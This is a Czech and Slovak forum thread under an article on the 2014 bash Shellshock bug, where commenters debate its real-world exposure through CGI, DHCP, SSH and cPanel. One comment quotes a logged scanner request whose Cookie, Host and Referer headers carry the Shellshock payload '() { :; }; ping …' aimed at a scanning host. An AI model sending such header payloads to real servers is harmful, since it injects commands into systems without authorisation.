Názory k článku
Chyba v bashi umožňuje vzdálené spuštění kódu
-
Sten (neregistrovaný)
Chyba se projevuje při importu proměnných prostředí do bashe. bash proměnné s obsahem začínajícím
()interpretuje jako funkce a pro jejich import používá něco jakoeval, což bohužel spustí i kód za definicí té funkce.Co se týče OpenSSH, zranitelnost je to pouze v případě, že máte uživatele, kteří mají nastavený
ForceCommand(v sshd_config nebo authorized_keys) a zároveň používají bash. Většina instalací Debianu je tedy v bezpečí, protože pro takové uživatele používá dash.Navíc specifické proměnné bashe umožňují dělat to samé (např.
PS1). -
Ondřej CaletkaZlatý podporovatelZatím jde o „slušné skenery“, co se představí :)
GET / HTTP/1.0 Accept: */* Cookie: () { :; }; ping -c 17 209.126.230.74 Host: () { :; }; ping -c 23 209.126.230.74 Referer: () { :; }; ping -c 11 209.126.230.74 User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html) -
Sniper (neregistrovaný)
Redhat vydal informaci, ze patch, ktery se distribuuje v aktualni aktualizaci bashe, neni uplne odolny, tedy aktualizace ted neznamena uplnou bezpecnost. Viz. https://access.redhat.com/articles/1200223 a https://access.redhat.com/security/cve/CVE-2014-7169
-
Nová zranitelnost se týká služby Bash (Bourne-Again SHell), která je běžnou součástí Unixových systémů. Ohroženy jsou tak především počítače běžící na Linuxu a OS X. Problém je závažnější i proto, že služba Bash běží i v rámci Apache, který pohání miliony webových stránek a systémů. ...
http://www.lupa.cz/clanky/heartbleed-ma-nastupce-bezpecnostni-dira-miri-na-linux-a-os-x/
A kuwa, je to ještě horší, než jsem čekal ...
-
Je to celé humbuk. Málokdo dnes používá CGI skripty a ještě méně lidí používá pro jejich obsluhu Bash (PHP ani jiné skriptovací jazyky postižené nejsou), abyste prorazili do webového serveru Apache (nebo jiného). Když byste chtěli nějaký stroj "hacknout" skrz SSH, tak potřebujete speciální nastavení na straně serveru a navíc "hacknete" jen sami sebe (musíte se nejprve úspěšně autentizovat jménem a heslem)... Tož... škoda :-(
Ohroženější je např. DHCP démon (přidělování IP adres stanicím v síti) a CUPS (tiskový server). To může být problém, ale ve větších sítích to pojede na extra stroji (nebo virtuálu), RHEL má SELinux, který intrudera pěkně ořeže...
Takže - jistě, je to problém. Ale RHEL/CentOS/Scientific Linux atd. už záplatu mají (nejdřív se mi v noci nainstalovala záplata a až pak se vyrojily tyhle zprávy). -
Zapomněl jsem dodat, že jestli někdo vystaví DHCP a CUPS volně do Internetu, tak dobře mu tak. Obvykle jsou ty stroje ve vnitřní síti, takže hrozí nebezpečí víceméně jen od vlastních uživatelů, na které má admin personální páky. Veřejné WiFi, to problém nejspíše nebude, protože v těch krabičkách nebude bash. Atd.
-
Lael Ophir (neregistrovaný)
Já se jen ptám, proč tu zdejší diskutéři nepíšou stejné demagogické nesmysly, jaké píšou k bugům ve Windows. To je přece správná otázka.
To že se našla chyba není moc hezké. BTW bug byl údajně nalezen 14.9. A problém dosud není opravený. Z druhého linku: "Update 2014-09-25 16:00 UTC Red Hat is aware that the patch for CVE-2014-6271 is incomplete..."
http://planetlotus.org/profiles/bill-malchisky_128568_linux-bash-bug--shellshock--is-real-get-patched-mac-too-
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ -
Lael Ophir (neregistrovaný)
Nebo jim to po heartbleed bugu už nestojí za komentář :)
http://www.cio.com/article/2375113/security0/why-you-should-still-worry-about-heartbleed.html -
l (neregistrovaný)
a co si tym chcel povedat? Ziadna alebo skoro ziadna nepouziva bash tam, kde je zranitelny.
Keby ano, tak ako pises "udajne" sa o bugu vie uz 2 tyzdne, komplexita zranitelnosti je nizka, zneuzitelnost extramna - cakal by som stovky tisic bezradnych linuxakov ktorym zli hackeri pohackovali ich krasne linuxove servery a masiny, spamujucich diskusne fora hlaskami "Z00mg, 1u57 g07 h4x00r30". Ale co to? Ticho po pesine... zatial som necital jediny pripad realneho zneuzitia tejto ... "chyby".
Tak si hod studeny rucnik na celo, lebo ti praskne nejaka zilka
-
Lael Ophir (neregistrovaný)
Ad Ziadna alebo skoro ziadna nepouziva bash tam, kde je zranitelny - četl jste ty linky? Z druhého linku:
- DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
- Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. ...
- etc. etc.Ad "udajne" sa o bugu vie uz 2 tyzdne - četl jste ten první link? Red Hat announced the bug on 14 Sep... On the 24th, Red Hat provided public documentation on this matter... Psal jsem údajně, protože jsem to našel jen v jednom zdroji. Podle NY Times Stephane Chazelas chybu nahlásil správci bashe už 12.9. Naštěstí byl odpovědný, a neuvolnil informace o chybě veřejně před jejím opravením. To co psal kolega hawran o hodně rychlé opravě tedy není tak úplně pravda - 14 dní je OK, ale nic ultra-rychlého.
http://www.nytimes.com/2014/09/26/technology/security-experts-expect-shellshock-software-bug-to-be-significant.html?_r=0Každopádně veřejný popis chyby je podle všeho venku až od 24.9. A útoky už se rozjíždějí. Podle Financial Times je v ohrožení v podstatě všechno od semaforů až po základní internetovou infrastrukturu. Sice jim to moc nežeru, ale trochu bych se obával o všechny ty domácí krabičky (WiFi hotspoty, ADSL routery atd.), na které asi už nikdo nikdy nevydá update firmwaru, a které zřejmě budou v domácnostech ležet, dokud se fyzicky nerozpadnou.
http://www.reuters.com/article/2014/09/25/us-cybersecurity-shellshock-idUSKCN0HK23Y20140925
http://www.ft.com/intl/cms/s/0/2f7d00d0-44a8-11e4-ab0c-00144feabdc0.html#axzz3ENq2Bflh -
l (neregistrovaný)
DHCP je asi jedine realne nebezpecenstvo - akurat ma trochu zasadnu nevyhodu. Musis bud nejaky dhcp server hacknut, alebo si vytvorit vlastny a prinutit uzivatela aby ho pouzil. Zneuzitelnost - pure random
CGI - kto dnes preboha pouziva CGI? Bud sa pouziva FastCGI, alebo libphp. A navyse kto z CGI scriptu vola system() alebo pise CGI scripty v bashi? Hroza, miliony webov su v ohrozeni. Zneuzitelnost - minimal
etc, etc.- tak daj dalsie priklady. Zapoj fantaziu, fabulacia ti nepomoze zvelicit zranitelnost vypisovanim "etc"
Co si mam citat? V dobe kedy to leaklo, uz bol dostupny fix a o par hodin neskor dalsi ktory to fixoval uplne. Keby to niekto nezverejnil skor, ziaden humbuk by sa nedial. a Zil by si dalej vo svojej vindousackej nevedomosti :)
"A útoky už se rozjíždějí" ... tak to som zvedavy, budem uporne cakat na hacknute semafory, chladnicky, toastovace, wifi hotspoty a adsl routre. Ostatne kolko wifi hotspotov a adsl routrov ma bash? :-D
Pises ze FUDy "na IT zameranych webov" ako FT a Reuters nezeres, ale aj-tak to tu pastujes linky na ne :-D To sa odborne nazyva kadenie si na hlavu :-D
-
l (neregistrovaný)
to su teda priam zastupy webmasterov :-D
Zrejme narazas na git repozitare - to by ale user musel mat nastaveny bash :-D Tam sa ale standartne bash nepouziva
Custom filter mailov - konkretne ktory? Pis jasne a zrozumitelne. Moj mbox filter nicim takym netrpi a z principu ani nemoze.
-
Lael Ophir (neregistrovaný)
CGI se samozřejmě používá na mnoha místech. Je fajn vědět, že vy používáte FastCGI nebo libphp, ale spousta jiných to tak nemá.
Ad etc, etc. tak daj dalsie priklady - boha, to byl copy-paste z blogu Red Hatu, který jsem linkoval. Navíc máte i na rootu celý článek na dané téma, který možnosti útoků rozebírá. Faktem je, že se tahle díra dá zneužít ve více scénářích, a nikdo nemá seznam aplikací, které jsou postižené.
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://www.root.cz/clanky/dira-v-bashi-ktere-si-20-let-nikdo-nevsiml/Ad kolko wifi hotspotov a adsl routrov ma bash - to fakt nevím. A vy to víte?
-
Seti (neregistrovaný)
CGI v bashi je taková obskurnost, že jsem se s tím nikde nesetkal. Samotné CGI totiž nestačí.
Kolik wifi hotspotů a routerů má bash? No, kolik? No přece žádný. Cpát takového molocha jako bash na jednoúčelové krabičky může jen idiot, a pak tedy dobře mu tak.
Takže FUD a trolling, nic neobvyklého.
-
Lael Ophir (neregistrovaný)
Jenže ono to CGI nemusí být v bashi. CGI předá parametry volanému procesu, a pokud ten později spustí bash, tak je vymalováno. Stačí aby aplikace třeba v PHP, Perlu apod. v některém místě volala popen(), nebo system() pro spuštění externích příkazů.
http://www.root.cz/clanky/dira-v-bashi-ktere-si-20-let-nikdo-nevsiml/Ve článku najdete i informaci o probíhajícím skenu. A samozřejmě se našlo dost zranitelných systémů.
http://4.bp.blogspot.com/-pZH_I9PpwWs/VCNRvFCs3MI/AAAAAAAACXs/qgifaweHnQ8/s1600/shellshock-responses.png
http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.htmlDalší výsledky, které ukazují, že to "není problém":
CGI scripts that are vulnerable... like cPanel's /cgi-sys/defaultwebpage.cgi
...
Someone is using masscan to deliver malware. They'll likely have compromised most of the system I've found by tomorrow morning. If they using different URLs and fix the Host field, they'll get tons more.
http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html -
Seti (neregistrovaný)
"Stačí aby aplikace třeba v PHP, Perlu apod. v některém místě volala popen(), nebo system() pro spuštění externích příkazů."
=>
"Pokud se totiž aplikace nepostará o vyčištění prostředí, může škodlivá proměnná průchod PHP v klidu přečkat a zaútočit až v okamžiku kdy kód v PHP zavolá (prostřednictvím bashe) externí příkaz. Týká se to ale naštěstí jen případů, kdy je webová aplikace propojena s web serverem prostřednictvím CGI, což se (mimo jiné z výkonostních důvodů) příliš často nepoužívá."
Demagogie.
"Jinými slovy: problém se právě rozjíždí. Pokud to bude s distribucí oprav vypadat jako u Heartbleed bugu, budeme se dost možná ještě všichni divit."
Tak si to užívejte :-) Opravy již byly dávno vydány. A BTW nevím, proč zrovna vy se vzrušujete, widlí se to netýká.
-
Lael Ophir (neregistrovaný)
Kde vidíte tu demagogii? Serverů jedoucích například kombinaci CGI/Perl je na světě víc než dost. Příkladem je cPanel.
Opravy bashe byly vydány, ale otázkou je, jestli se dostanou tam kde jsou potřeba. Například patche opravující Heartbleed bug byly instalovány dost pomalu.
A že se to Windows netýká? To máte jako když jeden člověk v kanceláři ztratí klíč od vchodových dveří, na kterém je adresa. Týká se to pak všech.
-
l (neregistrovaný)
- pretoze ked uz citujete, tak citujte cele, a nie len to co sa vam hodi do kramu.
- ta zranitelnost je len teoreticka + perl ma taint mode - odporucam vam nastudovat
- u vas je mozno zvykom ze si na kluce napisete adresu aby v pripade straty pripadny nalezca mohol ist skontrolovat obsah bytu/kancelarie. Nastastie vacsina aspon trochu rozumnych ludi nic taketo nerobi. Mozete pridat dalsie inteligentne priklady ako ze admin si v internetovej kraviarni nainstaluje tunel do podnikovej siete a sa zabudne sa odhlasit zo shellu s lognutym rootom, ... alebo nieco podobne - rad sa znovu zasmejem :-D
- vas panicky strach z linuxu je naozaj trochu do smiechu a zaroven trochu do placu. -
Lael Ophir (neregistrovaný)
Ten link tam byl proto, bych tu nemusel tapetovat celý odstavec.
Aha, takže ta zranitelnost je jen teoretická? Cituji autory cPanelu: On cPanel & WHM systems, there are numerous entry points where this vulnerability could be exploited.
http://cpanel.net/cpanel-security-team-bash-cve-2014-6217-and-cve-2014-7169/U toho přirovnání vám zjevně unikla pointa. Ta byla v tom, že pokud jeden člověk v kanceláři vyrobí problém třeba tím že ztratí klíče, tak nemá smysl říkat "mě se to netýká, já klíče neztratil". Obdobně pokud firemní systémy běží převážně na Windows, ale má byť jeden zranitelný systém na Linuxu, nemá smysl říkat, že to lidi okolo Windows nemusí zajímat, protože se jich to netýká.
Nevidím u sebe žádný panický strach z Linuxu. Naopak u vás vidím zlehčování problému.
-
Seti (neregistrovaný)
"Cituji autory cPanelu: On cPanel & WHM systems, there are numerous entry points where this vulnerability could be exploited."
Pokud jsou autoři cPanelu prasata a neumí si ošetřit případné vstupy uživatelů, je to jejich problém. Ne že bych se tomu divil, když ještě dnes je někdo schopný ignorovat SQL injection a předávat vstupy uživatele přímo do dotazu.
"Naopak u vás vidím zlehčování problému."
Tak jo, počkáme si na ty "desítky milionů" hacklých webů a wifi krabiček :-D
-
Seti (neregistrovaný)
"Kde vidíte tu demagogii?"
Část kompletně vytržená z kontextu tak, jak se vám hodí.
No a co, že serverů CGI/Perl je dost? Co to jako implikuje?
"Například patche opravující Heartbleed bug byly instalovány dost pomalu."
A čí je to chyba?
"A že se to Windows netýká?"
Ne, netýká. A speciálně vás už vůbec, protože vy sám jste psalm že linux NIKDE nepoužíváte.
-
Lael Ophir (neregistrovaný)
1. Jak je ta citace vytržená z kontextu? V odpovědi jste zvýraznil, že je podmínkou použití CGI, což jsem psal ještě před vlastní citací svými slovy, a bylo to předmětem předchozí diskuse.
2. To že existuje spousta serverů s CGI/Perl znamená, že jde o potenciálně zranitelné systémy.
3. To že admini špatně opravují bugy je samozřejmě jejich chyba. Ale kompromitované systémy jsou pak problém pro každého.
4. Asi mě nezajímá jen to, co se týká mě osobně :)
-
Seti (neregistrovaný)
1. Z toho, jak to píšete vy, vyplývá, že se jedná o jakoukoliv aplikaci v PHP, což není pravda.
2. Zranitelné může být při špatném přístupu kde co.
3. Kompromitovaných, nebo různě slabě zabezpečených systémů jsou na internetu mraky. Ničím se neliší od toho, že admini neupdatujou tento jeden problémek.
4. Nejde o zájem, jde o komentování. Už to tady psalo hodně lidí, včetně mě - to, že máte věčnou potřebu komentovat něco, co se vás netýká, s čím nepřicházíte do styku a o čem evidentně mnoho nevíte, svědčí o nějaké vaší poruše.
-
Lael Ohir (neregistrovaný)
Ad 1 - nic takového jsem netvrdil.
Ad 2, 3 - v mezičase se zranitelnost rozrůstá, a malware se šíří.
http://www.itnews.com.au/News/396256,further-flaws-render-shellshock-patch-ineffective.aspxhttp://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx
http://blog.trendmicro.com/trendlabs-security-intelligence/shellshock-updates-bashlite-ccs-seen-shellshock-exploit-attempts-in-brazil/Ad 4 - porucha je na vašem přijímači :)
-
l (neregistrovaný)
argumentujes deravymi wifi hotspotmi / adsl routrami skrz zranitelnost bashu s argumentom - vlastne neviem kolko z nich vobec bash pouziva. To je jak vystrihnute z kremelskych poviedok o ruskych vojakoch dovolenkujucich na ukrajine :-D
ad cut&paste - takze ty vlastne ani nemas ponatia v com bug spociva, sam si to ani nijako netestoval a spoliehas sa len na nejake cut&pasty z inych webov (hlavne financial times a reuters). Dobre vediet :-D
